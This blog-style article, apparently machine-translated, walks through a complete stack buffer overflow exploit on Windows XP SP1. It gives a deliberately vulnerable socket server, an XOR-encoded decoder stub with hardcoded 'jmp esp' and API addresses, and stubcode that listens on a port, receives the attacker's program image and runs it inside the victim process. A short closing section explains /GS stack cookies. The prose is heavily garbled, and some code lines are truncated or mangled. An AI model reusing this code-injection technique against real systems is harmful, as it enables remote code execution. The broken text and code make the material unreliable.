Offensive and defensive Buffer Overflow
For a long time in people's minds, "hackers" and the virus writers who always shrouded in a mysterious ring, they were various media described as technical experts or technical genius, so some people to prove their own "genius" status on the wrong track, or even break the law. Remember that not long ago seen on such a case: a computer professional graduate students invaded a commercial websites and delete all the data. When he was in prison in an interview with reporters, said that he was very proud to do so only in order to prove that their own sense of achievement and access.
This paper discusses a buffer overflow attacks is actually a very "old" technology, but its destructive power still can not be discounted - I think we all also have not forgotten a few months before "shock." In the text of the code is a real example of almost the virus, some of these technologies may not have seen you, but I can say it is not responsible use of any advanced technology, I do not have into ring0 not write device drivers, and even even compile code used only very simple 11. I hope that this article will enable a new awareness about "hackers" and virus writers, from the altar to "pull" down. I would also like to remind everyone to that "graduate" as a lesson, not to abuse this technology, it will Wanhuozifen. Below that are entered.
What is a buffer overflow
You must use strcpy copies of the string? That, if copies purpose of the buffer zone the length of the string is less than the length of the source string, what will happen? Right, in the source string of characters will be redundant coverage swap process other data. This phenomenon called a buffer overflow. According to the data covering the location of different buffer overflow divided into static storage overflow, stack overflow and heap overflow three. The spill occurred after the performance of the process may have three: One is operating normally, at this time, the coverage of useless data, and no unauthorized access; two running errors, including errors and output illegal operation section Three is under attack, started the implementation of harmful code, at this time, what data is covered and what data to the attacker coverage are carefully designed.
Under normal circumstances, static storage area and the buffer overflow vulnerabilities Duishang unlikely to be attacked to use. And the loopholes in the stack are in great danger, so we have to explain the stack buffer overflow as an example.
Principle attack
To carry out attacks, come to find target. So I called for a "victim" as the procedure was targeted, it logically equivalent to the following code:
Void GetComputerName (SOCKET sck, LPSTR szComputer)
(
Char szBuf [512];
Recv (sck, szBuf, sizeof (szBuf), 0);
LPSTR szFileName = szBuf;
While ((* szFileName) == '\ \')
SzFileName + +;
While ((* szFileName)! = '\ \' & & (* SzFileName)! = '\ 0')
(
* * SzFileName szComputer =;
SzComputer + +;
SzFileName + +;
)
* SzComputer = '\ 0';
)
Void ShowComputerName (SOCKET sck)
(
Char szComputer [16];
GetComputerName (sck, szComputer);
/ / Mov ecx, dword ptr [esp +4]
/ / Sub esp, 10h; — 2
/ / Lea eax, [esp]
/ / Push eax
/ / Push ecx
/ / Call GetComputerName (401000h)
Printf (szComputer);
/ / Lea edx, [esp]
/ / Push edx
/ / Call printf (401103h)
)
/ / Add esp, 14h
/ / Ret 4; — 3
Int __cdecl main (int argc, char * argv [])
(
WSADATA wsa;
WSAStartup (MAKEWORD (2,2), & wsa);
Struct sockaddr_in saServer;
SaServer.sin_family = AF_INET;
SaServer.sin_port = 0xA05B; / / htons (23456)
SaServer.sin_addr.s_addr = ADDR_ANY;
SOCKET sckListen = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
Bind (sckListen, (sockaddr *) & saServer, sizeof (saServer));
Listen (sckListen, 2);
SOCKET sckClient = accept (sckListen, NULL, NULL); / / — 1
ShowComputerName (sckClient);
Closesocket (sckClient);
Closesocket (sckListen);
WSACleanup ();
Return 0;
)
The procedure is intended victim from the network receives a UNC (Universal Naming Convention) form of a document, and then separated from the machine name on the screen and print. As normal circumstances, the machines were up only 16 bytes, so ShowComputerName function only szComputer allocated to the 16-byte long buffer zone, and GetComputerName nor the length of the buffer zone do any checks. Thus, in respect of ShowComputerName there is a buffer overflow vulnerabilities.
Found a loophole needs to be done next is to find loopholes of the specific attack methods. We look at the compiler ShowComputerName results, and each c / c + + language in the note below is compiled its corresponding assembly code. These code, I would like to make two points: one is used here stdcall calling convention, which is the most commonly used windows in the process of calling convention, in the examples below if there is no special code that will be the use of this agreement. Calling the agreement of the meaning and distinction, please refer to the relevant information. 2 due to the compiler, the compiler of different options, the compiler may not like the results, and behind the attack code is based on the above results of the compiler, I can not guarantee that your environment can also correct implementation.
I am in the process of tagging three labeling, the chart from the left to right are the three labeling procedures End corresponding code stack of state and the direction of esp register, each of which represents a small grid word, that is four bytes.
As can be seen from the map, when main calls ShowComputerName, procedures will be the first of its parameters Yazhan and then its implementation after the return address Yazhan. ShowComputerName access, process re-adjustment esp register for the local variables allocated storage space. ShowComputerName return and implementation of the "ret 4" command procedures not only to Jump to the continued operation of the return address, but also the return address, function parameters from the stack in the pop-up, call stack restored to the former state.
Obviously, if the machine UNC string of more than 16 bytes, function ShowComputerName buffer overflow will occur. In order to explain convenience Below I started from the attacker's perspective of how to construct the string will be able to perform some procedures "accident" code.
You may have found: ShowComputerName function on the return address stored in the "szComputer +16" Department. Therefore, if we can return address to "szComputer +20", and from the address "szComputer +20" We need to begin to fill in some of the data corresponding instructions, then we will be able to achieve the objective. Very glad that you can think of these, but it is impossible because we have to construct according to the szComputer string, and also identified in the completed structure szComputer End string. So, is not working and things, we must Guaiganwanæ‰è¡Œ.
If you also noted that the implementation of End cpu "ret 4" commands, esp pointing "szComputer +24", then you have seen the turning of where. The vast majority of cases, we can in the process address space have found a fixed address "jmp esp" instruction, we need only "szComputer +16" fill in the address of the instruction, and then from "szComputer +24" Fill attacks started on the directive. In this way, ShowComputerName return, cpu implementation of the "ret 4" command, then the implementation of the "jmp esp" instruction, the right to transfer control of our hands. How? Very simple!
But you also should not happy too early, only the above-mentioned buffer overflow attacks the basic tenets. The theory and practice is always some distance. To truly complete the attacks, we still have a number of difficult issues to be resolved.
First, is how to deal with some not appear in a string of characters. In the above code, if we built a string of bytes is 0 or "\", will refuse to copy GetComputerName behind the data, in our "computer name" there is no one byte is 0 or "\." "\" May be better said, but a "really do something" does not include the code 0 is almost impossible. How to resolve this contradiction? The simplest way is to XOR. First write real code and compile the outcome, I call stubcode. N then find a figure for 10 ≤ n ≤ 255 2 n is allowed to appear in a string of characters; stubcode n and any differences or one byte after the characters are allowed. N stubcode and by using a byte XOR, or get different results. Obviously, it is necessary to find a n, stubcode can not be too long, just do some simple preparations, and then load up the code and get more done, that is what I call it stubcode reasons. In fact, the code also needs a stubcode stubcode, we put it called stubstubcode bar, it is the task of n and with different results or to a case-by-byte XOR stubcode to restore the original appearance, and then to hand over control of stubcode. Stubstubcode very short, only about 20 bytes, through carefully designed to avoid in which there may not characters.
As the preceding analysis has proved impossible in our structure placed in a string of "jmp esp", and amend the return address at it, the second problem is where to find the "jmp esp" command. You may think that the process itself is the first choice, because exe file into a fixed address, as long as it contains the instructions, directives address is determined. But I regret to tell you that is wrong again. Although exe into the address will not change, but the address of the generally low, which found "jmp esp" address the high byte is certainly 0, it is not stubcode, we have no way to vary or to deal with it. If you read Zhuozuo "nt environment hide the realization of the process," you know for certain that the process will basically every kernel32.dll loading, and its address into the same operating system platform was fixed. Another important fact is that it addresses the load high enough to meet this demand without 0 bytes. Therefore, we have to go in kernel32.dll. But very unfortunate, in my winxp + sp1 system, a huge kernel32.dll, was not a "jmp esp" instruction hiding place (I have no other system for a try, you can readers who are interested in their own Try). I can only second best to go in user32.dll, it has in the system after kernel32.dll status. Eventually, I found the addresses 0 x77D437DB "jmp esp" on the scene.
The third problem is how to stubcode Calling API. "Hide process" in a text, which had also been discussed, but the situation now is different, because no off-the-shelf stubcode input table, we need to produce their own a small "input table," wrote the parameters as stubcode UNC string , stubcode also need a number of other parameters, these parameters I called stubparam. And the stubstubcode, stubparam, stubcode and other data together a string of UNC called stub. Of course, vary stubparam also needs to be done to avoid or deal with them in illegal characters.
Stubcode also not directly addressable instructions, the reason is very obvious, the solution is simple (not with no need for the J), I will not say more.
Examples attack
Our attack procedure called "attacker" and the successful, it will victim of the process of pop-up message box below.
The attacker first step is to supply stub (that is, UNC string) sent to the victim, so we have to look at the stub on the composition, as shown below:
Among them, filled with data to fill a return address all the elements of the former, this case is the space occupied by the szComputer; return address is the "jmp esp" instruction addresses; fill data used to fill 2 stubstubcode between the return address and the contents of this sck parameters cases is the use of space; stubstubcode, stubparam and stubcode have already said; filled three data will be used to stub out as a normal string look, for example, at the end of the meeting on characters such as 0.
In order to use the more convenient, I defined several structures that the stub. As you can see, they are "# pragma pack" compiler directive for a fixed byte alignment, which is very important, because it can be: a decrease stub size. Stack on the availability of limited space, the smaller the better stub; prevent compiler insert alignment for the extra bytes. If the compiler or in STUBSTUBCODE STUB insert additional byte, all our efforts will have been in vain.
# Pragma pack (push)
# Pragma pack (1)
Struct STUBSTUBCODE
(
BYTE arrConst1 [4]; / / 0×33, 0xC9, 0×66, 0xB9
WORD wXorSize; / / XOR deal with the need for the size of the data
BYTE arrConst2 [3]; / / 0×8D, 0×74, 0×24
BYTE byXorOffset; / / XOR deal with the need for the initial position of the code (as opposed to the migration esp)
BYTE arrConst3 [4]; / / 0×56, 0×8A, 0×06, 0×34
BYTE byXorMask; / / use this figure to vary or
BYTE arrConst4 [8]; / / 0×88, 0×06, 0×46, 0xE2, 0xF7, 0×8D, 0×44, 0×24
BYTE byEntryOffset; / / STUBCODE the entrance code addresses (as opposed to the migration esp)
BYTE arrConst5 [2] / / 0xFF, 0xD0
);
Struct STUBPARAM
(
FxLoadLibrary fnLoadLibrary;
FxGetProcAddr fnGetProcAddr;
FxVirtualAlloc fnVirtualAlloc;
DWORD dwImageSize;
DWORD rvaAttackerEntry;
Char szWs2_32 [11]; / / ws2_32.dll
Char szSocket [7]; / / socket
Char szBind [5]; / / bind
Char szListen [7]; / / listen
Char szAccept [7]; / / accept
Char szSend [5]; / / send
Char szRecv [5]; / / recv
);
Struct STUB
(
BYTE arrPadding1 [18];
DWORD dwJmpEsp;
BYTE arrPadding2 [4];
STUBSTUBCODE ssc;
STUBPARAM sp;
BYTE arrStubCode [1] / / In fact, this is a variable length arrays
);
# Pragma pack (pop)
STUBSTUBCODE counterpart is the beginning of this article mentioned 11 compilation statements. Stub reference to the overall structure, we can write its concrete realization.
Xor ecx, ecx
Mov cx, wXorSize; wXorSize to carry out differences or the size of the data processing
Lea esi, [esp + byXorOffset]; byXorOffset is the need for different or to deal with the initial position of code
Push esi
Xormask: mov al, [esi]
Xor al, byXorMask used to vary or byXorMask
Mov [esi], al
Inc esi
Loop xormask
Lea eax, [esp + byEntryOffset]; byEntryOffset address of the entrance is StubCode
Call eax
Some of them actually use constant variable substitution, wXorSize to carry out differences or the size of the data processing, which is the size of stubparam and stubcode and; byXorOffset that these data relative to the initial position esp shift register, from the structure it can be seen in the equivalent of "sizeof (STUBSTUBCODE)," At the same time, it is STUBPARAM add esp after the address, we should address this stubcode passed, it immediately down the stack, the specific see Below the relevant content; byXorMask is XOR mask, which is the figure mentioned earlier n; byEntryOffset is stubcode the entrance of the esp shift register, it is "sizeof (STUBSTUBCODE) + sizeof (STUBPARAM) +4" more because of a four-stack in front again in a few pressure. This code is useless before two more direct "mov ecx, wXorSize" is to avoid 0 characters.
Structure of the code and a comparison, look at that! Several structures in an array of corresponding code in the compilation of fixed, variable, the need to amend the part. This definition gives us an opportunity to dynamic modification stubstubcode, reduce the manual maintenance of the code.
STUBPARAM is to the definition of the parameters passed to stubcode, it is relatively simple, I believe you face stubcode After reading the introduction, the members will be able to understand the meaning and role of the. Which all "Fx" prefix for all types of data and the corresponding function pointer types, we will encounter later.
STUB in, I am the first one to fill an array of 18 bytes of space, the extra two bytes used to store the beginning UNC string "\ \", in this case it is not necessary. The arrStubCode it seems only one byte long, it is a variable length arrays, is the preservation of the structure of the data and fill stubcode 3.
Below we enter the last part of stub, and the most important part: stubcode, the code below.
Void WINAPI StubCode (STUBPARAM * psp)
(
HINSTANCE hWs2_32 = psp-> fnLoadLibrary (psp-> szWs2_32);
FxGetProcAddr fnGetProcAddr = psp-> fnGetProcAddr;
Fxsocket fnsocket = (Fxsocket) fnGetProcAddr (hWs2_32, psp-> szSocket);
Fxbind fnbind = (Fxbind) fnGetProcAddr (hWs2_32, psp-> szBind);
Fxlisten fnlisten = (Fxlisten) fnGetProcAddr (hWs2_32, psp-> szListen);
Fxaccept fnaccept = (Fxaccept) fnGetProcAddr (hWs2_32, psp-> szAccept);
Fxsend fnsend = (Fxsend) fnGetProcAddr (hWs2_32, psp-> szSend);
Fxrecv fnrecv = (Fxrecv) fnGetProcAddr (hWs2_32, psp-> szRecv);
BYTE * buf = (BYTE *) psp-> fnVirtualAlloc (NULL, psp-> dwImageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
SOCKET sckListen = fnsocket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
Struct sockaddr_in saServer;
SaServer.sin_family = AF_INET;
SaServer.sin_port = 0×3930; / / htons (12345)
SaServer.sin_addr.s_addr = ADDR_ANY;
Fnbind (sckListen, (sockaddr *) & saServer, sizeof (saServer));
Fnlisten (sckListen, 2);
SOCKET sckClient = fnaccept (sckListen, NULL, 0);
Fnsend (sckClient, (const char *) (& buf), 4, 0);
DWORD dwBytesRecv = 0;
BYTE * pos = buf;
While (dwBytesRecv <psp-> dwImageSize)
(
DwBytesRecv + = fnrecv (sckClient, (char *) pos, 1024, 0);
DwBytesRecv pos + = buf;
)
FxAttackerEntry fnAttackerEntry = (FxAttackerEntry) (buf + psp-> rvaAttackerEntry);
FnAttackerEntry (buf, psp-> fnLoadLibrary, psp-> fnGetProcAddr);
)
Void StubCodeEnd () () / / this function marks the end of stubcode
Stubcode to use LoadLibrary ws2_32.dll get a handle, and then through several API function GetProcAddress was the entrance of address. It then allocated dwImageSize VirtualAlloc with the size of memory, this memory is what is the use? In fact, the "hidden process", we have to inject another victim in the process of PE - is actually attacker himself - the image, so this is the preservation of image memory space, and dwImageSize that is the size of this image . After it began in the 12345 port on the interception until the connection request received attacker.
Establish a connection with the attacker, just StubCode will immediately start the distribution of the memory address of the past, the attacker according to the address of a copy of its own re-positioning, and then it will be sent back StubCode. StubCode put this just received copies of the allocation of memory to. Attacker there is another function "AttackerEntry" rvaAttackerEntry This is the function and address the attacker into the distance. Through this distance, StubCode the attacker can find a copy of the entrance AttackerEntry, thus transferred to the control of it. At this point, StubCode completed its mission.
Code using LoadLibrary and GetProcAddress way you do not unfamiliar? If we really do not understand, please read the "hidden process." VirtualAlloc also located in kernel32.dll, so I will take the side economic officials.
The code also has an empty function "StubCodeEnd" Although on the surface nothing has been done, but it has a very important task: I use it to calculate StubCode the function of the number of memory, and, accordingly calculated the size of the stub. Use the following method to:
Int nStubCodeSize = (int) (((DWORD) StubCodeEnd) - ((DWORD) StubCode));
I do not have any official information from the find could be the basis for doing so, but in my environment, it does good work!
With stub, we also need to fill some of its code into the victim and the same time. Injection process is simple network communications, not speaking, just look at the data filled.
BOOL PrepareStub (STUB pStub *)
(
/ / Copy const data
Memcpy (pStub, & g_stub, sizeof (STUB));
/ / Prepare stub code param
PStub-> dwJmpEsp = 0×77D437DB; / / This applies to several addresses
PStub-> sp.fnLoadLibrary = 0×77E5D961; / / victim in the operating procedures
PStub-> sp.fnGetProcAddr = 0×77E5B332; / / winxp pro + sp1 system
PStub-> = 0×77E sp.fnVirtualAlloc
PStub-> GetImageSize sp.dwImageSize = ((LPCBYTE) g_hInst);
PStub-> sp.rvaAttackerEntry = ((DWORD) AttackerEntry) - ((DWORD) g_hInst);
/ / Copy stub code
Int nStubCodeSize = (int) (((DWORD) StubCodeEnd) - ((DWORD) StubCode));
Memcpy (pStub-> arrStubCode, StubCode, nStubCodeSize);
/ / Find xor mask
Int nXorSize = (int) (sizeof (STUBPARAM) + nStubCodeSize);
LPBYTE pTmp = (LPBYTE) (& (pStub-> sp));
BYTE byXorMask = GetXorMask (pTmp, nXorSize (LPCBYTE) g_arrDisallow,
Sizeof (g_arrDisallow) / sizeof (g_arrDisallow [0]));
If (byXorMask == g_arrDisallow [0])
Return FALSE;
/ / Xor it
For (int i = 0; i
/ / Fill stubstubcode
PStub-> ssc.wXorSize = (WORD) nXorSize;
PStub-> ssc.byXorMask = byXorMask;
/ / Does the stubstubcode contains a disallowed char?
PTmp = (LPBYTE) (& (pStub-> ssc));
For (i = 0; i
For (int j = 0; j
If (* pTmp == g_arrDisallow [j])
Return FALSE;
/ / Make it an "valid" file name the victim wants
Strcpy ((char *)(&( pStub nStubCodeSize-> arrStubCode [])), g_szStubTail);
Return TRUE;
)
Among them, pStub at a prior allocation of memory, calculation of its size is good, and definitely not overrun (we do this trip, certainly in the first to solve the problem of self-J); g_stub is a type of global variables STUB , he preserved a stub in the fixed data; g_hInst attacker is the process of the handle, with its call for the parameters can be attacker GetImageSize memory image size; g_arrDisallow is a character array, there is not all the characters .
GetXorMask and used to calculate the stubparam stubcode to deal with the differences or mask, the code below:
BYTE GetXorMask (LPCBYTE pData, int nSize, LPCBYTE arrDisallow, int nCount)
(
BYTE arrUsage [256], by = 0;
Memset (arrUsage, 0, sizeof (arrUsage));
For (int i = 0; i For (i = 0; i <256; i + +) ( By = (BYTE) i; / / Xor mask can not be a disallowed char For (int j = 0; j Break; If (j <nCount) Continue; / / After xor, and the data should not contain a disallowed char For (j = 0; j Break; If (j> = nCount) Return by; ) / / We don't find it, and return the first disallowed char for an error Return arrDisallow [0]; ) XOR disposed of after PrepareStub according to the data calculated by the dynamic, modify stubstubcode. As data is a dynamic balance out, so it is necessary to make a final stubstubcode check to see there are not allowed characters. Finally, it g_szStubTail to stub filled with a complete UNC string, the whole stub declared completion of the preparatory work. Said earlier, the stubcode task is the establishment of a victim in the attacker's image, and then inside it to hand over control of the AttackerEntry function. Thus the second attacker is a copy of the self-positioning, to stubcode. The following code on to complete these tasks: … DWORD dwNewBase, dwSize; LPBYTE pImage; Recv (sck, (char *) (& dwNewBase), sizeof (DWORD), 0); GetImageSize dwSize = ((LPCBYTE) g_hInst); PImage = (LPBYTE) VirtualAlloc (NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); Memcpy (pImage, (const void *) g_hInst, dwSize); RelocImage (pImage, (DWORD) g_hInst, dwNewBase); DoInject (sck, pImage, dwSize); …
Stubcode attacker gain its first distribution of the initial memory address, the address is the victim of the attacker in the image of the site. Then the attacker a copy of their own, and in accordance with the new image-site copy of this re-positioning, RelocImage code and "process hidden" in basically the same, not going to repeat here. However, we should pay attention to: By default, the links will not be re-generated for the EXE file positioning table. So links attacker, it is necessary to add parameters "/ FIXED: No," compulsory re-positioning of links generates table. DoInject completion of data sent, simple network communications, it was little more than neglect.
The victim in the right of control will eventually be transferred to the hands of this function below.
FxGetProcAddr fnGetProcAddr)
(
G_hInst = (HINSTANCE) pImage;
If (LoadImportFx (pImage, fnLoadLibrary, fnGetProcAddr))
AttackerMain (g_hInst);
ExitProcess (0);
)
It with the "process hidden" in the ThreadEntry like, the biggest difference is that the final call ExitProcess end of the victim's life. This is a good understanding of the stack victim after a series of attacks have been beyond recognition, if AttackerEntry return to normal, victim certainly will pop up a reminder illegal operation of the dialog box. We are doing "a bad thing" and does not want to be discovered, so let victim quietly exit is the best option.
LoadImportFx and "process hidden" in exactly the same, and will not repeat it. As AttackerMain, I like the following. You - will have to play it, but please bear in mind you have to all of you!
DWORD WINAPI AttackerMain (HINSTANCE hInst)
(
TCHAR szName [64], szMsg [128];
GetModuleFileName (NULL, szName, sizeof (szName) / sizeof (TCHAR));
_stprintf (SzMsg, _T ( "process \"% s \ "buffer overflow vulnerabilities, a patch immediately!"), SzName);
MessageBox (NULL, szMsg, _T ( "You"), MB_OK | MB_ICONINFORMATION);
Return 0;
)
Defensive measures
There are attacking defenses against buffer overflow, although large, but it is not difficult to prevent. The most simple and effective method is to be careful when writing the code. For example, during the victim, if we get a parameter passed to GetComputerName to mark the length of the buffer zone, and GetComputerName inspection, then will be able to avoid the tragedy.
If you Bijiaolan, do not want to do these chores, the compiler also help you. From vs.net, compiler for a new option: / GS. Open it, the compiler will be a function of each check whether the spill may have occurred. If so, it inserted in to the function of this code, for example, in front of ShowComputerName processed, it will become similar to the following way. __ Security_cookie which compiler is a plug-ins and global variables, the process was initiated, according to a wealth of information hash algorithm used to initialize it, so it has good value randomness (see specific initialization process "seccinit.c").
Void ShowComputerName (SOCKET sck)
(
DWORD_PTR cookie = __security_cookie; / / insert code compiler
Char szComputer [16];
RecvComputerName (sck, szComputer);
Printf (szComputer);
__security_check_cookie (Cookie); / / insert code compiler
)
As shown in the code, enter ShowComputerName after the procedure the first thing is to ___ security_cookie the value of local variables to a copy of a cookie. NOTE: ShowComputerName the cookie is a local variable, the stack so it is the position of the return address, and other local variables, if szComputer copy of the string to the buffer overflow when, in the first cookie certainly return address is coverage, and its new value may continue to work with almost no __ security_cookie the same, thus the final __ security_check_cookie function can use the code below the overflow detection (This code is not used to x86 cpu, but it more comprehensible, and logical There is no distinction between specific See "secchk.c").
Void __fastcall __security_check_cookie (DWORD_PTR cookie)
(
/ * Immediately return if the local cookie is OK * /
If (cookie == __security_cookie)
Return;
/ * Report the failure * /
Report_failure ();
)
As a whole is very simple to achieve efficient, please do not try to look at the results. But such mechanisms are inadequate, first detected overflow procedure will terminate after running second is not all of the overflow, and slip through. Please refer to the specific information and experiments it.
Sheizhiguo
It is said that the security holes have been found in more than 50% of the root buffer overflow, Let us whether this figure is accurate, but it does note buffer overflow to the computer world the seriousness of the harm caused. People generally think that is because programmers "careless" will be so many loopholes. However, the responsibility should be programmers to really negative? I think not. First, the design of x86 cpu are some problems: function and the return address on the same common data in a stack, to the return address of the attacker covered the opportunity to address the stack from high to low growth orientation address this substantial increase a risk. Secondly, c standards for the design and implementation of memory occupied regardless of the efficiency of and created the risk of many similar strcpy function. Of course, I do not want to accusing them of the designers, I have not qualified, I just want to more in-depth discussion and a buffer overflow problem.
Note: The coverage of the return address jmp esp directive addresses to steal control of the buffer overflow attacks is the most typical kind. Under specific circumstances, there are many other methods,
0 Comments to “Offensive and defensive Buffer Overflow”
No Comments. Send your comment.
Leave a Reply
You must be logged in to post a comment.